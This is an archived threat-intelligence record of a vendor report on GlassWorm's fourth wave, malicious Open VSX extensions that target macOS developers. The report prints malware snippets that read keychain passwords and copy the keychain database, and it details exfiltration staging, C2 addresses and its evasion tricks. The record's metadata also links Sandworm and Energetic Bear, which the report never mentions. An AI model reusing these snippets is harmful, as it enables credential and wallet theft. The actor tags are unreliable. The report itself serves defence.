{ "id": "453c1abf-e4e5-49cd-8bad-ed9bf953b81e", "created_at": "2026-04-29T02:20:42.994873Z", "updated_at": "2026-04-29T08:23:09.552098Z", "deleted_at": null, "sha1_hash": "893f608ab8679164102f51ff63a972bb856eae24", "title": "GlassWorm Goes Mac: Fresh Infrastructure, New Tricks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2554733, "plain_text": "GlassWorm Goes Mac: Fresh Infrastructure, New Tricks\r\nBy Gal Hachamov,,\r\nArchived: 2026-04-29 02:05:13 UTC\r\nTwo and a half months ago, we exposed GlassWorm, the first self-propagating worm targeting VS Code\r\nextensions, using invisible Unicode characters to hide malicious code. We've tracked this threat actor through\r\nthree waves: invisible Unicode payloads, a return strike that exposed real victims including a Middle Eastern\r\ngovernment entity, and a pivot to compiled Rust binaries.\r\nNow they're back. With 50,000 downloads, a platform switch from Windows to macOS, and the infrastructure is\r\nfully operational as you read this.\r\nOur risk engine flagged three suspicious extensions on Open VSX marketplace. At first, they didn't look\r\nconnected to any campaign we'd been tracking. But then we noticed the Solana blockchain C2 – and when we\r\ntraced the infrastructure, a familiar IP confirmed our suspicion: 45.32.151.157, the same C2 server from\r\nGlassWorm's third wave.\r\nKoidex report for Prettier Pro\r\nThe invisible Unicode technique we exposed in October? Gone. The Rust binaries from Wave 3? Also gone. This\r\ntime, the payload is wrapped in AES-256-CBC encryption and embedded in compiled JavaScript - but the core\r\nmechanism remains the same: fetch the current C2 endpoint from Solana, execute what it returns. What's new is\r\nthe target: code designed to replace hardware wallet applications with trojanized versions.\r\nThe GlassWorm actor isn't just persistent - they're evolving. And now they're coming for your Mac.\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 1 of 8\n\nPrettier Pro on open-vsx\r\nThe Pivot: From Windows to macOS\r\nThis is the biggest change in Wave 4. Every previous GlassWorm wave targeted Windows exclusively. Wave 4\r\ntargets macOS exclusively.\r\nWhy the shift?\r\nDevelopers use Macs. Especially in crypto, web3, and startup environments – exactly the victims GlassWorm\r\nwants to compromise. The attacker is fishing where the fish are.\r\nThis isn't a lazy port. The macOS payload is purpose-built, using platform-specific techniques throughout:\r\nAppleScript for stealth execution instead of PowerShell:\r\nset keychainPassword to do shell script \"security 2\u003e\u00261 \\\\\r\n find-generic-password -s 'pass_users_for_script' -w\"\r\nLaunchAgents for persistence instead of Registry keys and Scheduled Tasks:\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 2 of 8\n\nDirect Keychain database theft:\r\nreadwrite(profile \u0026 \"/Library/Keychains/login.keychain-db\", \\\\\r\n writemind \u0026 \"keychain\")\r\nThe attacker knows macOS. This is professional work.\r\nNew Delivery Method: Encrypted JavaScript\r\nWave 1 used invisible Unicode characters – literally unrenderable code hidden in whitespace.\r\nWave 3 used compiled Rust binaries – native code that requires reverse engineering to analyze.\r\nWave 4 uses something different: AES-256-CBC encrypted payloads embedded directly in compiled JavaScript.\r\nHere's what we found at line 64 of pro-svelte-extension's main file:\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 3 of 8\n\nThe payload is encrypted with a hardcoded key and IV. Same key across all three extensions – confirming a single\r\nactor. But here's the clever part:\r\nThe 15-minute delay.\r\nThat 9e5 in the code? That's 900,000 milliseconds. Fifteen minutes.\r\nMost automated sandbox environments timeout after 5 minutes. By waiting 15 minutes before executing anything\r\nmalicious, the malware evades dynamic analysis completely. The sandbox sees a clean extension. It gets approved.\r\nAnd 15 minutes after a developer installs it, the real payload drops.\r\nThis is why traditional security scanning missed it.\r\nNew C2 Infrastructure (Mostly)\r\nThe attacker is using a new Solana wallet for this wave: BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC –\r\ndifferent from the wallets in previous waves, though the old ones remain active.\r\nWe can trace the infrastructure evolution through the blockchain. On November 27, a transaction pointed to\r\n217.69.11.60. By December, the C2 had shifted to 45.32.151.157 - an IP that also appeared in Wave 3. That's\r\nhow we know this is the same actor.\r\nThey also added a new exfiltration server: 45.32.150.251 .\r\nThe Solana blockchain C2 technique remains unchanged – the attacker posts transaction memos containing\r\nbase64-encoded URLs, and the malware queries the blockchain to find the current C2 endpoint. Immutable,\r\ndecentralized, impossible to take down.\r\nNew Capability: Hardware Wallet Trojans\r\nHere's where Wave 4 gets truly dangerous.\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 4 of 8\n\nPrevious GlassWorm waves stole credentials and installed backdoors. Wave 4 does all that – plus it attempts to\r\nreplace your hardware wallet applications with trojanized versions.\r\nImportant timing note: As of our testing on December 29, 2025, the C2 server endpoints for the trojanized\r\nwallets are returning empty files. The malware includes file size validation that prevents installation of files\r\nsmaller than 1000 bytes – a defensive programming choice that causes the wallet replacement to silently fail when\r\ndownloads are incomplete.\r\nThis could mean the attacker is still preparing the macOS wallet trojans, or the infrastructure is in transition. The\r\ncapability is built and ready – it's just waiting for payloads to be uploaded. All other malicious functionality\r\n(credential theft, keychain access, data exfiltration, persistence) remains fully operational.\r\nThe code checks for both Ledger Live and Trezor Suite:\r\nIf either is found, the malware downloads a trojanized replacement, removes the legitimate app, and installs the\r\nmalicious version in its place.\r\nThis is a significant escalation in capability. Hardware wallets are supposed to be the most secure way to store\r\ncryptocurrency. Users trust them precisely because the signing happens on a separate device. But if your Ledger\r\nLive or Trezor Suite application is compromised, the attacker can:\r\nDisplay fake receiving addresses\r\nModify transaction details before signing\r\nCapture your seed phrase during \"recovery\" flows\r\nIntercept communication between the app and device\r\nYour hardware wallet is only as secure as the software you use to interact with it.\r\nThe file size validation code reveals the attacker's attention to detail:\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 5 of 8\n\nThis isn't amateur hour. The attacker built in sanity checks to prevent broken installations that might alert victims.\r\nWhen the trojanized wallet payloads go live, the installation will be seamless.\r\nWhat Still Gets Stolen\r\nEven without the hardware wallet trojans active, the payload is devastating.\r\nCryptocurrency wallets – The malware targets 50+ browser extension wallets including MetaMask, Phantom,\r\nCoinbase Wallet, Exodus, Keplr, Solflare, Trust Wallet, and Rabby. It also goes after desktop wallets: Electrum,\r\nCoinomi, Exodus, Atomic, Ledger Live data, Trezor Suite data, Monero, and Bitcoin Core.\r\nDeveloper credentials – GitHub tokens from VS Code storage and git credential cache. NPM tokens from\r\n.npmrc. Your entire ~/.ssh directory. Git credentials from any cached authentication.\r\nSystem credentials – macOS Keychain passwords and the raw database file. VPN configurations. Browser\r\ncookies and local storage from Chrome, Firefox, Brave, and Edge.\r\nEverything gets staged in /tmp/ijewf/, compressed, and exfiltrated to 45.32.150.251/p2p .\r\nThe Evolution Pattern\r\nLet's step back and look at what we're seeing.\r\nWave 1 (October 17): Invisible Unicode in OpenVSX extensions. Windows-focused. Solana + Google Calendar\r\nfor C2.\r\nWave 2 (November 6): Same technique, more extensions. We accessed the attacker's server and found real\r\nvictims including a Middle Eastern government entity.\r\nWave 3 (November 22): Rust binaries instead of Unicode. No more invisible code – now it's compiled native\r\ncode that requires reverse engineering.\r\nWave 4 (December 19): Platform pivot to macOS. Encrypted JavaScript payloads. New Solana wallet. Hardware\r\nwallet trojanization capability added.\r\nThe pattern is clear. Each time we expose their techniques, they adapt:\r\nUnicode technique documented → Switched to Rust binaries\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 6 of 8\n\nRust binaries analyzed → Moved to encrypted JavaScript\r\nWindows targeting known → Pivoted to macOS\r\nCredential theft established → Added hardware wallet trojans\r\nThis is an active, adaptive threat actor who reads security research and evolves their tooling in response. The\r\nshared infrastructure (45.32.151.157) proves it's the same actor. The constant evolution proves they're not going\r\naway.\r\nIOCs\r\nExtension IDs (open-vsx):\r\nstudio-velte-distributor.pro-svelte-extension\r\ncudra-production.vsce-prettier-pro\r\nPuccin-development.full-access-catppuccin-pro-extension\r\nNetwork Indicators:\r\n45.32.151.157 – Primary C2 (shared with Wave 3)\r\n45.32.150.251 – Exfiltration server\r\n217.69.11.60 – Earlier C2 (November 27, 2025)\r\nBjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC – Solana C2 wallet\r\nFinal Thoughts\r\nGlassWorm is now a cross-platform threat.\r\nThese extensions were live for days. In that window, they accumulated 50,000 downloads while the VS Code\r\nMarketplace's automated scanning saw nothing wrong.\r\nThat's not a failure of the scanning - it's a limitation of the approach. When malware waits 15 minutes to execute,\r\nstatic analysis will always come up clean. When C2 infrastructure lives on an immutable blockchain, there's no\r\ndomain to blacklist. When the attacker reads your research and ships new techniques within weeks, signature-based detection is always one step behind.\r\nFour waves in two and a half months. Each one more capable than the last. The question isn't whether there will\r\nbe a Wave 5 - it's whether you'll catch it before your developers install it.\r\nThis writeup was authored by the research team at Koi Security.\r\nOur risk engine, Wings, flagged these extensions within hours of publication. When attackers evolve this fast, you\r\nneed continuous behavioral analysis across your entire software supply chain.\r\nBook a demo to see how Koi catches what satisfactory scanners miss.\r\nStay safe out there\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 7 of 8\n\nSource: https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nhttps://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks" ], "report_names": [ "glassworm-goes-mac-fresh-infrastructure-new-tricks" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-29T06:58:56.199012Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "Blue Echidna", "FROZENBARENTS", "UAC-0113", "UAC-0082", "Quedagh", "TEMP.Noble", "TeleBots", "IRIDIUM", "Seashell Blizzard", "APT44", "VOODOO BEAR", "IRON VIKING", "G0034", "ELECTRUM" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-29T06:58:57.873095Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-29T06:58:57.491949Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-29T06:58:57.716092Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1777429242, "ts_updated_at": 1777450989, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.pdf", "text": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.txt", "img": "https://archive.orkl.eu/893f608ab8679164102f51ff63a972bb856eae24.jpg" } }